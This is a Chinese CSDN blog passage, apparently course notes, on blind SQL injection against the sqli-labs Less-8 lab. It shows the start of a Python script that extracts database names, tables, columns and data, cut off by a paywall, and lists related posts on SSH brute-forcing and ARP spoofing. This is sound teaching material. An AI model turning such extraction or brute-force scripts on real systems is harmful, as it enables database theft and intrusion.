python安全攻防第五章漏洞检测与防御2

最新推荐文章于 2021-04-21 18:58:25 发布
最新推荐文章于 2021-04-21 18:58:25 发布
阅读量165 收藏
点赞数
分类专栏: python安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/109164081
版权
本文探讨了Python安全攻防中的一种常见威胁——SQL盲注。通过示例URL <http://192.168.0.128/sqli/Less-8/?id=1>,解释了如何根据页面反馈判断SQL盲注是否成功,推测服务器端可能的SQL语句。
摘要由CSDN通过智能技术生成

sql盲注脚本

url:http://192.168.0.128/sqli/Less-8/?id=1
此关是关于sql盲注,如果盲注正确页面则会显示 You are in …,如果盲注错误,则不会显示
由此可以猜测服务器端的sql语句为:

select * from users where id = '$id' limt 0,1;
limit对显示长度作出了限制

#!/usr/bin/python3
# -*- coding: utf-8 -*-


import requests
import optparse

# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {
   }
# 若页面返回真,则会出现You are in...........
flag = "You are in..........."

# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False


# 盲注主函数
def StartSqli(url):
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if (columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])


# 获取数据库名函数
def GetDBName(url
最低0.47元/天 解锁文章
kongytr
关注
专栏目录
89.PE文件解析之通过Python获取时间戳判断软件来源地区1
08-03
2. **Ollydbg动态调试程序**:Ollydbg是一款流行的Windows平台下逆向工程工具,允许动态地分析PE文件的执行过程,有助于理解程序的行为和查找潜在的安全漏洞。 三、Python获取时间戳 Python中可以使用`os.path....
Python安全漏洞及防护总结
m0_49706119的博客
07-26 4085
Python安全漏洞及防护总结
Python小练习】实现威胁情报监控报警
慢就是快
02-03 1002
文章目录1.需求2.原理3.实现4.效果5.其他优化 1.需求 作为一名安全打工仔,经常忙于各种漏洞追踪复现,但是天天频繁看网站更新太费精力,所以打算写个情报监控,脚本挂在服务器上跑,网站一更新,就发信息到微信提醒。临时写的demo,比较糙,将就看吧。 2.原理 监控网站(以腾讯安全为例) https://s.tencent.com/research/bsafe/ 监控主要元素如下: 流程示意图: 爬取网站:request模块 提取元素:re beautifulsoup模块 时间比较:time 模块
python框架漏洞_Python 中的 10 个常见安全漏洞,以及如何避免(下)
weixin_39886251的博客
12-05 249
简评:编写安全代码很困难,当你学习一个编程语言、模块或框架时,你会学习其使用方法。 在考虑安全性时,你需要考虑如何避免被滥用,Python也不例外,即使在标准库中,也存在用于编写应用的不良实践。然而,许多 Python 开发人员却根本不知道它们。6. 解析 XML(Parsing XML)如果你的应用程序要加载、解析 XML 文件,则你可能正在使用 XML 标准库模块。通过 XML 的攻击大多是 ...
因为在此系统上禁止运行脚本_利用Python脚本实现漏洞情报监控与通知的经验分享...
weixin_39710561的博客
12-04 253
前言本文主要介绍了笔者利用一个简单的Python脚本实现漏洞情报的监控以及自动通报的相关经验。一、背景笔者所在公司某一个业务系统用到了漏洞频发的Struts2框架,S2-045爆发的时候刚好是刚进公司不久,还没有落实好漏洞通报排查工作,因此该业务系统的服务器就因为这个漏洞沦陷了,后续又接连出了好几个RCE漏洞,好在及时发布了预警和响应排查,没有受到影响。鉴于S2的漏洞频繁爆发,且动不动就...
第76天:Python开发-内外网收集Socket&子域名&DNS1
08-03
通过熟练掌握这些技术,安全从业者可以更有效地发现潜在的漏洞和威胁,提升网络防御能力。 总结来说,Python开发中的Socket编程、子域名查找和DNS解析是网络攻防中的关键技能。通过学习和实践,不仅可以提高工作...
小迪安全笔记,详细版本
最新发布
01-23
7. **代码审计与漏洞挖掘**:理解脚本语言是进行漏洞挖掘的关键,代码审计能帮助发现潜在的安全问题。 8. **后门**:后门是攻击者留下的通道,便于再次侵入。常见后门包括网站后门(webshell)和服务器后门等。在安全...
安全客 2017年季刊-第一期
04-20
整体来看,这份季刊涵盖了信息安全的多个重要领域,包括Web应用安全、内网安全、二进制漏洞分析与利用、安全工具开发以及攻击和防御对抗。通过这些文章,安全专家可以提高识别和应对安全威胁的能力,进而保护个人和...
Python最佳学习路线图
10-15
Python安全攻防** - **基础知识:** - Python在网络安全领域的应用。 - Kali Linux工具箱介绍。 - **实践操作:** - 使用Python进行漏洞扫描。 - 编写自动化渗透测试脚本。 - 学习如何防御常见的网络攻击...
python——文件上传脚本
willow_liang的博客
10-28 1144
#bytes和字符串之间的转换 test = 'hello world' print(type(test)) byte = test.encode('utf-8') print(type(byte)) string = byte.decode() #decode解码 print(type(string)) F:\python3.8\python.exe 模块.py <class 'str'> <class 'bytes'> <class 'str'> Proce
python之目录爆破
willow_liang的博客
11-04 1064
队列的使用 import queue q = queue.Queue() #空队列 for i in range(10): q.put(i) while not q.empty(): print(q.get()) 0 1 2 3 4 5 6 7 8 9 import queue import threading q = queue.Queue() #空队列 for i in range(30): q.put(i) def test(q): while not
python之cookie分析器
willow_liang的博客
10-31 967
scapy模块学习 from scapy.all import * def packet_callback(packet): print(packet.show()) sniff(filter="", iface="eth0", prn = packet_callback,count=1, store=0 ) #filter指定过滤器 #iface为设置嗅探器的网卡 #prn指定嗅探到符合过滤器条件的数据包时所调用的回调函数 #count用于指定嗅探的数据包个数 #store不在内存当中保留原始
python安全攻防第五章SQLMap的Tamper脚本
willow_liang的博客
10-19 768
Tamper简介 sqlmap的tamper一般用来绕过waf进行sql注入,脚本在tamper目录下。 以0eunion.py为例 #!/usr/bin/env python """ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ import re from lib.core.enums import PRIORITY #
第五章5.1redis未授权访问漏洞
willow_liang的博客
10-14 674
5.1未授权访问漏洞安全配置,权限认证,授权页面存在逻辑缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库网站等敏感信息写偶。目前存在未授权访问漏洞的服务包括:NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,ZooKeeper等 5.1.1redis未授权访问漏洞介绍 kali下载按照redis客户端redis-cli 1.获取redis资源   wget http://download.redis.io/releases/redis-4.0.
python安全攻防第三章之Poc
willow_liang的博客
10-10 643
pocsuite安装 安装pocsuite3 pip3 install pocsuite 安装数据包 pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/ requirement.txt内容 requests == 2.22.0 PySocks == 1.7.1 requests-toolbelt == 0.9.1 urllib3 == 1.25.6 flask简介 Flask是一个使用pyt
python之信息收集
willow_liang的博客
11-03 616
1.收集域名信息 # whois # https://www. tianyancha. com ! 2.收集敏感信息 # site:edu.cn intext:后台 # site:Github. comsmtp @163. com # firefox工作台查找有用信息 # https ://www.exploit-db.com/google-hacking-database 3.收集子域名信息 # fierce -dns baidu.com -threads 10 # site:baidu. com 4.收
python安全攻防第七章ssh爆破脚本
willow_liang的博客
10-22 612
#-*- coding:utf-8 -*- import optparse import sys import os import threading import paramiko #parasmiko为ssh登录模块 class ThreadWork(threading.Thread): def __init__(self,ip,usernameBlock,passwordBlock,port): threading.Thread.__init__(self)
python之arp欺骗
willow_liang的博客
11-03 552
kali使用Ettercap进行arp欺骗 192.168.0.105加入target1,192.168.0.1网关加入target2 点击MITM中的ARP windows7查看mac地址已经发生变化 可以用driftnet查看被攻击的win7访问网页的图片,最新版的kali未安装该软件,实际测试该软件应该只能查看一些加密不严格的网站 或者使用wireshark抓包嗅探 win7登录dvwa过程,可在kali抓包嗅探到 python编写arp欺骗脚本 srp发送数据包 verbose不显
python爬虫二——数据解析
willow_liang的博客
04-21 376
1.正则 爬取图片 import requests import re import os headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" } # url = 'https://pic.qiushibaike.com/system/pictures/12425/124253455/medium/BS3559JFPXJ1DIL.
Python安全编程实战指南:漏洞利用与防御技术
2. **端口扫描**:这部分介绍了如何使用Python进行网络扫描,检查目标主机开放的端口,这对于网络安全审计和漏洞探测至关重要。 3. **反向shell**:学习如何创建一个能在目标机器上执行的可逆连接,通常用于攻击后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值